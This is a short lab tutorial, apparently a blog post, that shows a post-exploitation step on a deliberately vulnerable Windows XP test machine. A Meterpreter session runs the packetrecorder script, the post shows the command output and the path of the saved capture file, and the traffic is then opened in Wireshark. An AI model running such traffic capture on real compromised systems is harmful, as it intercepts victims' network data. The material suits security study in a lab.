This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/LAB_20130625.5807/LAB_20130625.5807.cap
[*] Packet capture interval is 30 Seconds
^C <– Control +C to stop the process
[*] Interrupt
[+] Stopping Packet sniffer…
meterpreter >
The file is saved in the folder .MSF4, which is a hidden folder in Kali within Root.
Rather conveniently, everything logged by Packetrecorder is saved in the .pcap file format which is perfect for Wireshark:
And 192.168.1.79 is the IP of the target machine.